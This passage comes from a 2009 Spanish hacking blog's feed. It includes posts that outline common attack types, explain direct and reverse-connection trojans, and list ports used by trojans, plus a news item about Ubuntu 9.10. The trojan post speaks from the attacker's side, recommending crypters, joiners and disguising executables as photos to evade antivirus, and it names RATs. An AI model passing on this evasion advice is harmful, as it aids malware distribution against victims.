utilización de programas troyanos esta dentro de esta categoría, y refiere a falsas versiones de un software con el objetivo de averiguar información, borrar archivos y hasta tomar control remoto de una **** a través de Internet.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;SPOOFING &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Esta técnica es utilizada para actuar en nombre de otros usuarios, usualmente para realizar tareas de snoofing o tampering. Una forma común de spoofing, es conseguir el nombre y password de un usuario legítimo para, una vez ingresado al sistema, tomar acciones en nombre de él, como puede ser el envío de falsos e-mails.&lt;br /&gt;El intruso usualmente utiliza un sistema para obtener información e ingresar en otro, y luego utiliza este para entrar en otro, y en otro. Este proceso, llamado Looping, tiene la finalidad de evaporar la identificación y la ubicación del atacante. El camino tomado desde el origen hasta el destino puede tener muchas estaciones, que exceden obviamente los límites de un país. Otra consecuencia del looping es que una compañía o gobierno pueden suponer que están siendo atacados por un competidor o una agencia de gobierno extranjera, cuando en realidad están seguramente siendo atacado por un insider, o por un estudiante a miles de Km. de distancia, pero que ha tomado la identidad de otros.&lt;br /&gt;El looping hace su investigación casi imposible, ya que el investigador debe contar con la colaboración de cada administrador de cada red utilizada en la ruta, que pueden ser de distintas jurisdicciones.&lt;br /&gt;Los protocolos de red también son vulnerables al spoofing. Con el IP spoofing, el atacante genera paquetes de Internet con una dirección de red falsa en el campo From, pero que es aceptada por el destinatario del paquete.&lt;br /&gt;El envío de falsos e-mails es otra forma de spoofing permitida por las redes. Aquí el atacante envía a nombre de otra persona e-mails con otros objetivos. Tal fue el caso de una universidad en USA que en 1998 debió reprogramar una fecha completa de exámenes ya que alguien en nombre de la secretaría había cancelado la fecha verdadera y enviado el mensaje a toda la nómina (163 estudiantes).&lt;br /&gt;&lt;br /&gt;&lt;b&gt;JAMMING o FLOODING &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Este tipo de ataques desactivan o saturan los recursos del sistema. Por ejemplo, un atacante puede consumir toda la memoria o espacio en disco disponible, así como enviar tanto tráfico a la red que nadie más puede utilizarla.&lt;br /&gt;Muchos ISPs (proveedores de Internet) han sufrido bajas temporales del servicio por ataques que explotan el protocolo TCP. Aquí el atacante satura el sistema con mensajes que requieren establecer conexión. Sin embargo, en vez de proveer la dirección IP del emisor, el mensaje contiene falsas direcciones IP (o sea que este ataque involucra también spoofing). El sistema responde al mensaje, pero como no recibe respuesta, acumula buffers con información de las conexiones abiertas, no dejando lugar a las conexiones legítimas.&lt;br /&gt;Muchos servidores de Internet han sido dados de baja por el “ping de la muerte”, una versión-trampa del comando ping. Mientras que el ping normal simplemente verifica si un sistema esta enlazado a la red, el ping de la muerte causa el reinicio o el apagado instantáneo del equipo.&lt;br /&gt;Otra acción común es la de enviar millares de e-mails sin sentido a todos los usuarios posibles en forma continua, saturando los distintos servidores de destino.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;BOMBAS LOGICAS &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Este suele ser el procedimiento de sabotaje mas comúnmente utilizado por empleados descontentos. Consiste en introducir un programa o rutina que en una fecha determinada destruirá, modificara la información o provocara el cuelgue del sistema.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;INGENIERA SOCIAL &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Básicamente convencer a la gente de que haga lo que en realidad no debería. Por ejemplo llamar a un usuario haciéndose pasar por administrador del sistema y requerirle la password con alguna excusa convincente. Esto es común cuando en el Centro de **** los administradores son amigos o conocidos.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DIFUSION DE VIRUS &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Si bien es un ataque de tipo tampering, difiere de este porque puede ser ingresado al sistema por un dispositivo externo (diskettes) o través de la red (e-mails u otros protocolos) sin intervención directa del atacante. Dado que el virus tiene como característica propia su autoreproducción, no necesita de mucha ayuda para propagarse a traves de una LAN o WAN rápidamente, si es que no esta instalada una protección antivirus en los servidores, estaciones de trabajo, y los servidores de e-mail.&lt;br /&gt;Existen distintos tipos de virus, como aquellos que infectan archivos ejecutables (.exe, .com, .bat, etc.) y los sectores de inicio de discos y diskettes, pero aquellos que causan en estos tiempos mas problemas son los macro-virus, que están ocultos en simples documentos o planilla de cálculo, aplicaciones que utiliza cualquier usuario de PC, y cuya difusión se potencia con la posibilidad de su transmisión de un continente a otro a través de cualquier red o Internet. Y además son multiplataforma, es decir, no están atados a un sistema operativo en particular, ya que un documento de MS-Word puede ser procesado tanto en un equipo Windows 3.x/95/98 , como en una Macintosh u otras.&lt;br /&gt;Cientos de virus son descubiertos mes a mes, y técnicas más complejas se desarrollan a una velocidad muy importante a medida que el avance tecnológico permite la creación de nuevas puertas de entrada. Por eso es indispensable contar con una herramienta antivirus actualizada y que pueda responder rápidamente ante cada nueva amenaza.&lt;br /&gt;El ataque de virus es el más común para la mayoría de las empresas, ya que en un gran porcentaje responden afirmativamente cuando se les pregunta si han sido víctimas de algún virus en los últimos 5 años.&lt;br /&gt;&lt;br /&gt;fuente: foro.latinohack&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-7473483072300072314?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/7473483072300072314/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/tipos-de-ataques-hacking.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7473483072300072314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7473483072300072314'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/tipos-de-ataques-hacking.html' title='Tipos de ataques hacking'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-226190198888326436</id><published>2009-10-30T17:06:00.001+01:00</published><updated>2009-10-30T17:09:06.959+01:00</updated><title type='text'>El nuevo rival para Windows 7?</title><content type='html'>&lt;span style="color:Red;"&gt;&lt;span style="font-size:100%;"&gt;*Canonical ha presentado la revisión 9.10 de su sistema operativo.&lt;br /&gt;*Basado en software libre, incluye varias mejoras.&lt;br /&gt;*Su lanzamiento coincide con el de Windows 7. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mFMUaCwtbag/SusPT-1VRvI/AAAAAAAAACU/HLpK36YLMpg/s1600-h/1015840.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 70px;" src="http://2.bp.blogspot.com/_mFMUaCwtbag/SusPT-1VRvI/AAAAAAAAACU/HLpK36YLMpg/s320/1015840.jpg" alt="" id="BLOGGER_PHOTO_ID_5398425414292293362" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;La compañía Canonical, responsable de Ubuntu, acaba de anunciar el lanzamiento de la versión 9.10 de ese sistema operativo basado en Linux.&lt;br /&gt;&lt;br /&gt;Las primeras pruebas de esta revisión han sido, al parecer, positivas, tal y como apuntan medios especializados como eWeek Europe. Éste destaca "novedades interesantes" en el nuevo Ubuntu, como por ejemplo la mejora en la encriptación de unidades, unas políticas de permisos más exigentes y nuevos servicios en nube.&lt;br /&gt;&lt;br /&gt;La página de la compañía explica además, paso a paso, las utilidades que ofrece: desde email, que se complementa con un libro de direcciones y un calendario compatible con MS Outlook, a un chat que se integra con Yahoo, Gmail, MSN, Jabber o AOL entre otros.&lt;br /&gt;&lt;br /&gt;Para navegar, escoge Mozilla Firefox 3.5 por "su rapidez y seguridad".&lt;br /&gt;&lt;br /&gt;Sus usuarios podrán, asimismo, subir fácilmente a la web sus fotos para compartirlas con los amigos en redes sociales como Flickr, Facebook y Picassa. También posibilita gestionar archivos musicales, crear documentos de trabajo o disfrutar con más de 400 juegos "complemente gratis".&lt;br /&gt;&lt;br /&gt;El arranque de esta revisión de Ubuntu coincide con el del nuevo Windows 7, del cual se ha dicho que es "tan bonito como lo que hace Apple y no te trata como un burro". Además, este último ofrece como puntos fuertes una compatibilidad óptima con programas externos, ventanas inteligentes y arranque rápido.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-226190198888326436?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/226190198888326436/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/el-nuevo-rival-para-windows-7.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/226190198888326436'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/226190198888326436'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/el-nuevo-rival-para-windows-7.html' title='El nuevo rival para Windows 7?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mFMUaCwtbag/SusPT-1VRvI/AAAAAAAAACU/HLpK36YLMpg/s72-c/1015840.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6643011385414559213</id><published>2009-10-27T11:53:00.000+01:00</published><updated>2009-10-27T12:19:04.105+01:00</updated><title type='text'>Siguiendo con troyanos</title><content type='html'>Bueno hay 2 tipos de troyanos que se explicaran a continuacion:&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;Troyano de Conexion Directa:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Que quiere decir la conexion directa, significa que nosotros nos conectamos al puerto de la victima, osea esta no se conecta a nosotros, lo cual es algo desventajoso porque lo mas comun es que al ejecutar el server.exe salte el firewall&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;Troyano Conexion Inversa:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Esto es todo lo opuesto al de la directa, en este caso la victima se conectara a nosotros, lo cual al ejecutar el server.exe no saltara ningun mensaje en la victima, lo cual hace mejor el server.&lt;br /&gt;&lt;br /&gt;Los troyanos usan herramientas para ocultarse ya que al ser virus  o ejecutables .exe no se pueden mandar por correo y si los descargas enseguida dara alarma de virus ,para eso se usan estas herraminentas:&lt;br /&gt;&lt;br /&gt;Joiner,cripter,poliformos,no-ip,exescope,ResHacker,ect......&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Definicion de Joiner:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un joiner es un software utilizado para juntar en un solo archivo varios, este esta conformado por el .exe y el stab&lt;br /&gt;&lt;br /&gt;&lt;span style="color:yellow;"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;¿ Que es un cripter ?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Un cripter es un programa que encripta o modifica cierto programa, para asi hacerlo indetectable en la mayoria de los casos, hay muchos como por ejemplo el Themida seria uno de los mejores.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;¿Que es Poliformismo?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;El polimorsimo se resume en que una aplicacion es capaz de cambiar el formato de sus copias haciendo esa copia indetectable a un antivirus. Algo asi como si fuera un crypter que va creando copias de si mismo pero con un algoritmo de encriptacion variable que haga que nunca una copia tenga el formato de otra.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;¿Que es una cuenta NO-IP?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El servicio de DNS dinámica de No-IP permite identificar tu PC con un nombre de dominio fácil de recordar, y esto lo utilizan las personas que no tiene una IP estatica, la usan para que para los troyanos de conexion inversa, ya que si se quieren conectar a la IP vieja y esta cambia por decirlo asi, el troyano no se conectara, este servidor lo que hace es como crear una especie de IP que nos conecta al server.&lt;br /&gt;&lt;span style="color:yellow;"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;¿Que es el exescope?&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Es una utilidad que te ayuda a personalizar una application.Tu  puede cambiar el menú, el tipo de letra, un arreglo de dialog.eXeScope puede analizar, visualizar diversa información, y reescribir los recursos de archivos ejecutables, es decir, EXE, DLL, OCX, etc . files.Analyze sin fuente y mostrar archivos ejecutables &lt;b&gt;(EXE, DLL, etc)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;¿Que es ResHacker ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Se usa para modificar a gusto los recursos de diseño de muchas aplicaciones, tales cómo&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;span style="color: rgb(0, 0, 0);"&gt;iconos&lt;/span&gt;&lt;/span&gt;, pantallas de inicio etc.......&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En definitiva los hacen indetectables ,pareciendo que es alguna foto o algun video y los anti-virus no lo detectan.&lt;br /&gt;&lt;br /&gt;Algunos programas o troyanos&lt;br /&gt;&lt;br /&gt;&lt;b style="color: rgb(0, 0, 0);"&gt;1º - Poison Ivy 2.3.2&lt;br /&gt;2º - Bifrost 1.2.1&lt;br /&gt;3º - Bifrost.v.2.0 Special&lt;br /&gt;4º - Helminth v0.1&lt;br /&gt;5º - Hav-Rat 1.3.2&lt;br /&gt;6º - Lost Door V2.2 Stable Public Edition&lt;br /&gt;7º - PaiN RAT 0.1 Beta 8&lt;br /&gt;8º - RCBF EVA 1.0&lt;br /&gt;9º - S616 Rat&lt;br /&gt;10º - Shark 3.1&lt;br /&gt;11º - Spy-Net [RAT] v1.6&lt;br /&gt;12º - Spy-Net [RAT] v1.7&lt;br /&gt;13º - SpyOne V1.0.1&lt;br /&gt;14º - SynRat&lt;br /&gt;15º - TsuRat&lt;br /&gt;16º - Xploit1.4.5&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color:White;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="color:yellow;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6643011385414559213?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6643011385414559213/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/siguiendo-con-troyanos.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6643011385414559213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6643011385414559213'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/siguiendo-con-troyanos.html' title='Siguiendo con troyanos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4038930807192939927</id><published>2009-10-24T10:52:00.000+02:00</published><updated>2009-10-24T10:54:03.503+02:00</updated><title type='text'>Puertos utilizados por troyanos</title><content type='html'>LISTADO DE PUERTOS:&lt;br /&gt;&lt;br /&gt;port 1 (UDP) - Sockets des Troie&lt;br /&gt;port 2 Death&lt;br /&gt;port 20 Senna Spy FTP server&lt;br /&gt;port 21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash&lt;br /&gt;&lt;br /&gt;port 22 Shaft&lt;br /&gt;port 23 Fire HacKer, Tiny Telnet Server - TTS, Truva Atl&lt;br /&gt;port 25 Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy&lt;br /&gt;&lt;br /&gt;port 30 Agent 40421&lt;br /&gt;port 31 Agent 31, Hackers Paradise, Masters Paradise&lt;br /&gt;port 41 DeepThroat, Foreplay&lt;br /&gt;port 48 DRAT&lt;br /&gt;port 50 DRAT&lt;br /&gt;port 58 DMSetup&lt;br /&gt;port 59 DMSetup&lt;br /&gt;port 79 CDK, Firehotcker&lt;br /&gt;port 80 711 trojan (Seven Eleven), AckCmd, Back End, BackOrifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader&lt;br /&gt;&lt;br /&gt;port 81 RemoConChubo&lt;br /&gt;port 99 Hidden Port, NCX&lt;br /&gt;port 110 ProMail trojan&lt;br /&gt;port 113 Invisible Identd Deamon, Kazimas&lt;br /&gt;port 119 Happy99&lt;br /&gt;port 121 Attack Bot, God Message, JammerKillah&lt;br /&gt;port 123 Net Controller&lt;br /&gt;port 133 Farnaz&lt;br /&gt;port 137 Chode&lt;br /&gt;port 137 (UDP) - Msinit&lt;br /&gt;port 138 Chode&lt;br /&gt;port 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz&lt;br /&gt;port 142 NetTaxi&lt;br /&gt;port 146 Infector&lt;br /&gt;port 146 (UDP) - Infector&lt;br /&gt;port 170 A-trojan&lt;br /&gt;port 334 Backage&lt;br /&gt;port 411 Backage&lt;br /&gt;port 420 Breach, Incognito&lt;br /&gt;port 421 TCP Wrappers trojan&lt;br /&gt;port 455 Fatal Connections&lt;br /&gt;port 456 Hackers Paradise&lt;br /&gt;port 513 Grlogin&lt;br /&gt;port 514 RPC Backdoor&lt;br /&gt;port 531 Net666, Rasmin&lt;br /&gt;port 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy&lt;br /&gt;port 605 Secret Service&lt;br /&gt;port 666 Attack FTP, Back Construction, BLA trojan, Cain &amp; Abel, NokNok, Satans Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)&lt;br /&gt;port 667 SniperNet&lt;br /&gt;port 669 DP trojan&lt;br /&gt;port 692 GayOL&lt;br /&gt;port 777 AimSpy, Undetected&lt;br /&gt;port 808 WinHole&lt;br /&gt;port 911 Dark Shadow&lt;br /&gt;port 999 Deep Throat, Foreplay, WinSatan&lt;br /&gt;port 1000 Der Späher / Der Spaeher, Direct Connection&lt;br /&gt;port 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx&lt;br /&gt;port 1010 Doly Trojan&lt;br /&gt;port 1011 Doly Trojan&lt;br /&gt;port 1012 Doly Trojan&lt;br /&gt;port 1015 Doly Trojan&lt;br /&gt;port 1016 Doly Trojan&lt;br /&gt;port 1020 Vampire&lt;br /&gt;port 1024 Jade, Latinus, NetSpy&lt;br /&gt;port 1025 Remote Storm&lt;br /&gt;port 1025 (UDP) - Remote Storm&lt;br /&gt;port 1035 Multidropper&lt;br /&gt;port 1042 BLA trojan&lt;br /&gt;port 1045 Rasmin&lt;br /&gt;port 1049 /sbin/initd&lt;br /&gt;port 1050 MiniCommand&lt;br /&gt;port 1053 The Thief&lt;br /&gt;port 1054 AckCmd&lt;br /&gt;port 1080 WinHole&lt;br /&gt;port 1081 WinHole&lt;br /&gt;port 1082 WinHole&lt;br /&gt;port 1083 WinHole&lt;br /&gt;port 1090 Xtreme&lt;br /&gt;port 1095 Remote Administration Tool - RAT&lt;br /&gt;port 1097 Remote Administration Tool - RAT&lt;br /&gt;port 1098 Remote Administration Tool - RAT&lt;br /&gt;port 1099 Blood Fest Evolution, Remote Administration Tool - RAT&lt;br /&gt;port 1150 Orion&lt;br /&gt;port 1151 Orion&lt;br /&gt;port 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice&lt;br /&gt;port 1200 (UDP) - NoBackO&lt;br /&gt;port 1201 (UDP) - NoBackO&lt;br /&gt;port 1207 SoftWAR&lt;br /&gt;port 1208 Infector&lt;br /&gt;port 1212 Kaos&lt;br /&gt;port 1234 SubSevenJavaclient, Ultors Trojan&lt;br /&gt;port 1243 BackDoor-G, SubSeven, SubSevenApocalypse, Tiles&lt;br /&gt;port 1245 VooDoo Doll&lt;br /&gt;port 1255 Scarab&lt;br /&gt;port 1256 Project nEXT&lt;br /&gt;port 1269 Matrix&lt;br /&gt;port 1272 TheMatrix&lt;br /&gt;port 1313 NETrojan&lt;br /&gt;port 1338 Millenium Worm&lt;br /&gt;port 1349 Bo dll&lt;br /&gt;port 1394 GoFriller, Backdoor G-1&lt;br /&gt;port 1441 Remote Storm&lt;br /&gt;port 1492 FTP99CMP&lt;br /&gt;port 1524 Trinoo&lt;br /&gt;port 1568 Remote Hack&lt;br /&gt;port 1600 Direct Connection, Shivka-Burka&lt;br /&gt;port 1703 Exploiter&lt;br /&gt;port 1777 Scarab&lt;br /&gt;port 1807 SpySender&lt;br /&gt;port 1966 Fake FTP&lt;br /&gt;port 1967 WM FTP Server&lt;br /&gt;port 1969 OpC BO&lt;br /&gt;port 1981 Bowl, Shockrave&lt;br /&gt;port 1999 Back Door, SubSeven, TransScout&lt;br /&gt;port 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator&lt;br /&gt;port 2001 Der Späher / Der Spaeher, Trojan Cow&lt;br /&gt;port 2023 Ripper Pro&lt;br /&gt;port 2080 WinHole&lt;br /&gt;port 2115 Bugs&lt;br /&gt;port 2130 (UDP) - Mini Backlash&lt;br /&gt;port 2140 The Invasor&lt;br /&gt;port 2140 (UDP) - Deep Throat, Foreplay&lt;br /&gt;port 2155 Illusion Mailer&lt;br /&gt;port 2255 Nirvana&lt;br /&gt;port 2283 Hvl RAT&lt;br /&gt;port 2300 Xplorer&lt;br /&gt;port 2311 Studio 54&lt;br /&gt;port 2330 Contact&lt;br /&gt;port 2331 Contact&lt;br /&gt;port 2332 Contact&lt;br /&gt;port 2333 Contact&lt;br /&gt;port 2334 Contact&lt;br /&gt;port 2335 Contact&lt;br /&gt;port 2336 Contact&lt;br /&gt;port 2337 Contact&lt;br /&gt;port 2338 Contact&lt;br /&gt;port 2339 Contact, Voice Spy&lt;br /&gt;port 2339 (UDP) - Voice Spy&lt;br /&gt;port 2345 Doly Trojan&lt;br /&gt;port 2565 Striker trojan&lt;br /&gt;port 2583 WinCrash&lt;br /&gt;port 2600 Digital RootBeer&lt;br /&gt;port 2716 The Prayer&lt;br /&gt;port 2773 Subseven, SubSeven2.1Gold&lt;br /&gt;port 2774 SubSeven, Sub Seven 2.1 gold&lt;br /&gt;port 2801 Phineas Phucker&lt;br /&gt;port 2989 (UDP) - Remote Administration Tool - RAT&lt;br /&gt;port 3000 Remote Shut&lt;br /&gt;port 3024 WinCrash&lt;br /&gt;port 3031 Microspy&lt;br /&gt;port 3128 Reverse WWW Tunnel Backdoor, RingZero&lt;br /&gt;port 3129 Masters Paradise&lt;br /&gt;port 3150 The Invasor&lt;br /&gt;port 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash&lt;br /&gt;port 3456 Terror trojan&lt;br /&gt;port 3459 Eclipse 2000, Sanctuary&lt;br /&gt;port 3700 Portal of Doom&lt;br /&gt;port 3777 PsychWard&lt;br /&gt;port 3791 Total Solar Eclypse&lt;br /&gt;port 3801 Total Solar Eclypse&lt;br /&gt;port 4000 SkyDance&lt;br /&gt;port 4092 WinCrash&lt;br /&gt;port 4242 Virtual Hacking Machine - VHM&lt;br /&gt;port 4321 BoBo&lt;br /&gt;port 4444 Prosiak, Swift Remote&lt;br /&gt;port 4567 File Nail&lt;br /&gt;port 4590 ICQ Trojan&lt;br /&gt;port 4950 ICQ Trogen (Lm)&lt;br /&gt;port 5000 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie&lt;br /&gt;port 5001 Back Door Setup, Sockets des Troie&lt;br /&gt;port 5002 cd00r, Shaft&lt;br /&gt;port 5010 Solo&lt;br /&gt;port 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified&lt;br /&gt;port 5025 WM Remote KeyLogger&lt;br /&gt;port 5031 Net Metropolitan&lt;br /&gt;port 5032 Net Metropolitan&lt;br /&gt;port 5321 Firehotcker&lt;br /&gt;port 5333 Backage, NetDemon&lt;br /&gt;port 5343 wCrat - WC Remote Administration Tool&lt;br /&gt;port 5400 Back Construction, Blade Runner&lt;br /&gt;port 5401 Back Construction, Blade Runner&lt;br /&gt;port 5402 Back Construction, Blade Runner&lt;br /&gt;port 5512 Illusion Mailer&lt;br /&gt;port 5534 The Flu&lt;br /&gt;port 5550 Xtcp&lt;br /&gt;port 5555 ServeMe&lt;br /&gt;port 5556 BO Facil&lt;br /&gt;port 5557 BO Facil&lt;br /&gt;port 5569 Robo-Hack&lt;br /&gt;port 5637 PC Crasher&lt;br /&gt;port 5638 PC Crasher&lt;br /&gt;port 5742 WinCrash&lt;br /&gt;port 5760 Portmap Remote Root Linux Exploit&lt;br /&gt;port 5880 Y3K RAT&lt;br /&gt;port 5882 Y3K RAT&lt;br /&gt;port 5882 (UDP) - Y3K RAT&lt;br /&gt;port 5888 Y3K RAT&lt;br /&gt;port 5888 (UDP) - Y3K RAT&lt;br /&gt;port 5889 Y3K RAT&lt;br /&gt;port 6000 The Thing&lt;br /&gt;port 6006 Bad Blood&lt;br /&gt;port 6272 Secret Service&lt;br /&gt;port 6400 The Thing&lt;br /&gt;port 6661 TEMan, Weia-Meia&lt;br /&gt;port 6666 Dark Connection Inside, NetBus worm&lt;br /&gt;port 6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan&lt;br /&gt;port 6669 Host Control, Vampire&lt;br /&gt;port 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame&lt;br /&gt;port 6711 BackDoor-G, SubSeven, VP Killer&lt;br /&gt;port 6712 Funny trojan, SubSeven&lt;br /&gt;port 6713 SubSeven&lt;br /&gt;port 6723 Mstream&lt;br /&gt;port 6771 Deep Throat, Foreplay&lt;br /&gt;port 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer&lt;br /&gt;port 6838 (UDP) - Mstream&lt;br /&gt;port 6883 Delta Source DarkStar (??)&lt;br /&gt;port 6912 Shit Heep&lt;br /&gt;port 6939 Indoctrination&lt;br /&gt;port 6969 GateCrasher, IRC 3, Net Controller, Priority&lt;br /&gt;port 6970 GateCrasher&lt;br /&gt;port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold&lt;br /&gt;port 7001 Freak88, Freak2k&lt;br /&gt;port 7215 SubSeven, SubSeven 2.1 Gold&lt;br /&gt;port 7300 NetMonitor&lt;br /&gt;port 7301 NetMonitor&lt;br /&gt;port 7306 NetMonitor&lt;br /&gt;port 7307 NetMonitor&lt;br /&gt;port 7308 NetMonitor&lt;br /&gt;port 7424 Host Control&lt;br /&gt;port 7424 (UDP) - Host Control&lt;br /&gt;port 7597 Qaz&lt;br /&gt;port 7626 Glacier&lt;br /&gt;port 7777 God Message, Tini&lt;br /&gt;port 7789 Back Door Setup, ICKiller&lt;br /&gt;port 7891 The ReVeNgEr&lt;br /&gt;port 7983 Mstream&lt;br /&gt;port 8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero&lt;br /&gt;port 8787 Back Orifice 2000&lt;br /&gt;port 8988 BacHack&lt;br /&gt;port 8989 Rcon, Recon, Xcon&lt;br /&gt;port 9000 Netministrator&lt;br /&gt;port 9325 (UDP) - Mstream&lt;br /&gt;port 9400 InCommand&lt;br /&gt;port 9872 Portal of Doom&lt;br /&gt;port 9873 Portal of Doom&lt;br /&gt;port 9874 Portal of Doom&lt;br /&gt;port 9875 Portal of Doom&lt;br /&gt;port 9876 Cyber Attacker, 